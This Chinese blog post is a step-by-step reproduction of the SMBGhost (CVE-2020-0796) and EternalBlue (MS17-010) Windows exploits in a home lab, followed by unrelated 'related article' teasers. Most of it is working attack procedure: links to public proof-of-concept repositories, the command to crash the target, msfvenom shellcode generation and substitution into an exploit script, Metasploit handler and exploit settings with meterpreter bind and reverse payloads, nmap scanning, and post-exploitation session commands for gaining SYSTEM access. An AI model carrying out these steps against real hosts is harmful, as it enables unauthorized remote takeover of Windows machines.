永恒之黑和永恒之蓝 漏洞解析及复现

充当攻击机的机器是kali,另外需要关闭防火墙策略。

永恒之黑(CVE-2020-0796

靶机:windows 10的IP地址:192.168.200.30

原理:实现远程代码执行

注意:

这个脚本运行有时候会导致靶机蓝屏,需重启靶机,几次执行脚本知道得到shell。

漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
攻击poc:https://github.com/eerykitty/CVE-2020-0796-PoC
shell脚本:https://github.com/chompie1337/SMBGhost_RCE_PoC

检验

1.WIN10的防火墙和自动更新功能关闭。

2.在攻击机上对目标机进行检测,看其是否存在漏洞,检测目标存在漏洞。

1702443745_65793ae1877ec25dd533a.png!small?1702443746651

3.利用poc脚本对靶机发起攻击(kali中执行)。

python3 CVE-2020-0796.py 192.168.200.30

win10 就会出现蓝屏,攻击成功。

1702443754_65793aeaccca60edb33fa.png!small?1702443755852

反弹shell

1.生成反向连接木马。

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1234 -b '\x00' -i 1 -f python

# 对端口号是1234进行监听

2.用生成的shellcode将shell脚本工具里面的exploit.py中的buf替换为USER_POYLOAD。保留名字,只替换内容。1702443763_65793af3a93c1345d3ea1.png!small?1702443765780

在真机中进行修改较方便,然后在将文件传入到KALI中去(按下CTRL+F将buf 替换为 user_payload)。

1702443772_65793afca0629b8f381bb.png!small?1702443774587

3.开启msf模块。

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 1234
set rhost 192.168.200.30
run

1702443782_65793b06018ec89ba5ebb.png!small?1702443783264

注意:1.监听模块的端口设置,和生成的木马设置的端口要相同,用于反弹shell的入口的。

2.倘若出现问题,可以使用show options进行查看自己设置的信息。

4.运行exploit.py脚本,发起攻击,并且反弹shell。

(如果此处失败,请多次尝试 回车 即可)

1702443789_65793b0d4bc1e8492ce4d.png!small?1702443790497

5.执行成功后,查看监听的的串口,成功得到shell(这里需要输入shell获取靶机权限,以此更方便的查看)。

1702443795_65793b13bb1e94968bb9e.png!small?1702443797174

输入ipconfig之后可以看到靶机的IP地址,实现了远程代码执行,这时就可以在此最高权限下进行玩耍!

1702443802_65793b1a6be46bb745674.png!small?1702443803923

永恒之蓝漏洞复现(ms17-010)

IP地址可能会有变化,如本文思路有能帮助到您的地方,不胜荣幸!

基础命令

#进入msf:msfconsole
#使用search查找相关漏洞: search  ms17-010
#使用use进入模块: use 数字  
#使用info查看模块信息:info 
#设置poc的连接方式:set payload windows/x64/meterpreter /reverse_tcp  
#查看模块需要配置的参数:show options
#设置参数:set RHOST 192.168.200.4
#攻击:exploit / run 
#回退:back

后渗透命令

#查看当前用户:getuid
#进入shell:shell
#解决shell乱码:chcp 65001
#退出shell:exit
#把会话放到后台:background
#查看所有会话:sessions
#进入某个会话: sessions -i id号
#删除会话:sessions -k id号

环境准备

攻击机:kali:192.168.200.1

被攻击机:win7 x64 192.168.200.4 关闭防火墙

1 主机发现

在kali中使用nmap扫描win7

Nmap -sS 192.168.200.4

如下发现主机开启了445端口,操作系统类型可能为win7。

1702443820_65793b2ce8733e3c7d265.png!small?1702443822318

WIN7IP地址。

1702443829_65793b356f6f57434f2c7.png!small?1702443830568

WIN7MAC地址。

1702443837_65793b3d1bfc1352008ba.png!small?1702443838143

2 漏洞探测

先进入msf,然后搜寻ms17-010的漏洞模块。

Msfconsole   
#搜寻模块:search ms17-010 
#使用模块:use 3 

我们先使用scanner模块对主机进行扫描,检测是否存在漏洞,使用use 3。

1702443849_65793b49001be551f18f6.png!small?1702443850255

1702443855_65793b4f10df609a16fb4.png!small

1702443864_65793b58be5c1e2b7d6ce.png!small?1702443865791

进入到该模块之后,可以使用info查看该漏洞模块的具体介绍信。

info

那怎么利用这个模块来对主机进行扫描了?使用show options选项,查看我们要输入的具体参数,其中标注了yes的选项是必须的参数,若这个参数为空,则需要我们填写。RHOSTS选项为空,所以我们需要填写,RHOSTS代表要攻击的目标。输入r然后按tab键可以自动补全该参数。

show options
set rhosts 192.168.200.4

1702443893_65793b7530d255a83bc14.png!small?1702443894495

1702443899_65793b7b6ce78cd7e06eb.png!small?1702443900719

下面就可以执行扫描攻击。

run

显示主机很可能能够会受到永恒之蓝漏洞的攻击。

1702443906_65793b821b4a98b1c047c.png!small?1702443907235

3 漏洞攻击

检测存在漏洞后,就可以尝试对漏洞进行攻击,我们选择漏洞利用模块,然后和上面的操作一样,填写必须的参数。

search 17-010
use 0
#设置payload连接的方式,reverse_tcp为反向连接,即受害机主动连接攻击机,以获取shell
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhosts 192.168.200.4

1702443921_65793b913ea9b5d2b8f25.png!small?1702443922713

1702443925_65793b95c533251a0c646.png!small?1702443927274

执行攻击,返回一个meterpreter 会话,通过该会话可以控制目标主机,成功拿下主机system权限。

1702443933_65793b9d6cae08b5669fb.png!small?1702443934676

拿到主机权限后,可以进入该主机的shell(cmd),执行cmd命令。

#进入dos命令行:shell
#切换编码,解决乱码问题:chcp 65001
#cmd命令的执行:ipconfig

1702443942_65793ba65af812ca150e4.png!small?1702443943518

1702443948_65793bac64eb7c2f7faf5.png!small?1702443949605

至此,整个攻击过程结束。暂时不用这个会话了,可以退出当前shell,然后把该会话放到msf后台。

exit
background

1702443956_65793bb41c77c0dc5f91f.png!small?1702443957248

查看所有连接的会话,随时可以进入某个会话。

sessions
sessions -i id号

1702443963_65793bbb4d78003e62a9e.png!small?1702443964562

完结!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/403189.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

施华洛世奇 Swarovski EDI需求分析

施华洛世奇为全球首屈一指的光学器材及精确切割仿水晶制造商,为时尚服饰、首饰、灯饰、建筑及室内设计提供仿水晶元素。施华洛世奇有两个主要业务,分别负责制造及销售仿水晶元素,以及设计制造成品。 EDI传输协议 施华洛世奇 Swarovski 与合作…

郑板桥的人生境界是难得糊涂

郑板桥是康熙秀才,雍正举人,乾隆进士。 郑板桥小时候跟父亲在真州读书,长大后在真州教书。后来,郑板桥去扬州卖画谋生。 郑板桥没有老师,画画靠自己琢磨。郑板桥一生画竹,画了四十年的竹子,主…

nginx反向代理和负载均衡配置

配置文件 位置 : /usr/local/software/nginx/conf vim nginx.conf 在http大括号下配置: upstream wnBalance{ server ip:端口 weight比重 :1或者2; 1为配重高 server ip:端口 weight1; } wnBalance : 代表括号中两个ip的变量名 位置 : /usr/local/so…

MFC 皮肤库配置

1.创建MFC 对话框 2.添加皮肤资源 添加资源 添加头文件 关闭SDL检测 添加静态库文件 修改字符集 添加头文件 将皮肤中的ssk文件加载到初始化实例中 > 运行即可

JAVAEE初阶 网络编程(十一)

HTTP协议 一. GET和POST方法二. Post和Get的区别三. HTTP协议中的请求报头部分1. Host2.Content-Length3.Content-Type4.User-Agent5. Referer6.Cookie 一. GET和POST方法 Get方法应用场景有很多,比如下列这个例子. Post方法主要应用在上传和登录上. 一般来说,Get方法没有body,…

Sora:视频生成模型作为世界模拟器

我们探索了视频数据上生成模型的大规模训练。具体来说,我们在可变持续时间、分辨率和长宽比的视频和图像上联合训练文本条件扩散模型。我们利用了一个在视频和图像潜在码的时空块上操作的变压器架构。我们规模最大的模型 Sora 能够生成一分钟的高保真视频。我们的结…

2024-02-22(Spark)

1.Spark Application程序入口为:SparkContext,任何一个应用首先需要构建SparkContext对象,两个步骤构建: 第一步,创建SparkConf对象。设置Spark Application基本信息,比如应用的名称AppName和应用运行Mast…

模拟电路设计必读:模电四大名著(可下载)

在模拟电路设计领域,有一些经典著作被誉为模拟电路设计的四大名著。这些书籍不仅深入浅出地介绍了模拟电路设计的基本原理,而且涵盖了广泛的应用场景和实践技巧。若你想在模拟电路设计领域取得更进一步的成就,以下这几本书是不可或缺的&#…

Deeplink深度链接打破屏障,实现App营销推广的无限可能

在移动互联网时代,App作为连接用户与服务的桥梁,其重要性不言而喻。然而,App的营销推广却面临着诸多挑战:如何实现站外任意触点快速跳转至App关键页?如何全链路跟踪并精准挖掘用户安装来源?如何促进App裂变…

存储密码时为什么要加盐?

存储密码时为什么要加盐? 本文转自 公众号 ByteByteGo,如有侵权,请联系,立即删除 今天来聊聊存储密码时为什么要加盐。 存储密码应注意 不要用纯文本存储密码,因为任何有内部访问权限的人都可以看到它们。直接存储密码…

猫咪不喝水是什么原因?猫不喝水的完美解决方法!

养过很多只猫的人都知道,猫似乎普遍不太喜欢喝水。只看到一只或两只猫不喝水,那可能是个别现象。但似乎绝大部分的猫都不太爱喝水,这是为什么呢? 一、猫咪不喝水是什么原因? 如果你已经尝试了各种方法来让猫咪多喝水…

【析】考虑同时取送和时间窗的车辆路径及求解算法

期刊:computer engineering and applications 计算机工程与应用![c 引言 1. 问题分析 1.1 问题描述 问题描述为: 若干运输车辆从配送中心出发为客户取送货并最终返回配送中心,每位客户仅由一辆车服务一次,车辆在配送过程中任…

WEB-UI自动化测试实践

🔥 交流讨论:欢迎加入我们一起学习! 🔥 资源分享:耗时200小时精选的「软件测试」资料包 🔥 教程推荐:火遍全网的《软件测试》教程 📢欢迎点赞 👍 收藏 ⭐留言 &#x1…

Aloudata StarRocks 直播预告:指标平台的物化加速实践

数据指标的管理、研发和应用一直存在着诸多痛点,这些挑战促使了对指标平台解决方案的需求不断增长。2月29日(星期四)19:00,Aloudata 将与 StarRocks 携手举办线上直播,深入揭秘第三代指标平台物化加速的强大能力&#…

【Python】实现一个类似于Glass2k的Windows窗口透明化软件

一 背景说明 网上看到一款Windows下的窗口透明化工具Glass2k(Glass2k官网),可以简单地通过快捷键实现任意窗口的透明化,还挺方便的,想用Python自己实现一下类似的功能。 软件已经开源到:窗口透明化小工具开…

vue大文件读取部分内容,避免重复加载大文件,造成流量浪费

使用场景:项目点云地图是pcd文件,但是文件可能上百兆,我需要获取到文件中的版本信息,跟本地的缓存文件做比较,如果不一致,才会加载整个文件。从而节省流量。 避免重复加载整个“.pcd文件,以最大…

Linux篇:Shell命令以及运行原理 和 权限

一. Shell命令及原理 Linux操作系统狭义上是Linux内核,广义上是指Linux内核Linux外壳(Shell)和对应的配套程序 Linux外壳:Linux 外壳是用户与内核之间的接口,用户通过外壳与操作系统进行交互和操作。在 Linux 系统中,用户可以选…

软件确认测试流程和作用简析,出确认测试报告的软件测评公司分享

软件确认测试是指对软件产品进行验证和确认,以确保其满足预先设定的需求和规格。它是软件开发过程中的重要一步,旨在发现和解决潜在的问题和错误,以提高软件的质量和可靠性。 一、软件确认测试的流程有哪些?   1、需求分析和测试计划制定…

【Spring】SpringBoot 创建和使用

目 录 一.什么是Spring Boot?为什么要学Spring Boot?二.Spring Boot 优点三.Spring Boot 项目创建3.1 使用 Idea 创建3.2 网页版创建注意事项:包路径错误小结:约定大于配置 一.什么是Spring Boot?为什么要学Spring Boo…

C#串口 Modbus通讯工具类

一、安装Modbus包 二、创建modbushelper类 1、打开串口 public bool IfCOMOpend; //用于实例内的COM口的状态 public SerialPort OpenedCOM;//用于手动输入的COM转成SERIAL PORT /// <summary> /// 打开串口 /// </summary> /// <param name="COMname&quo…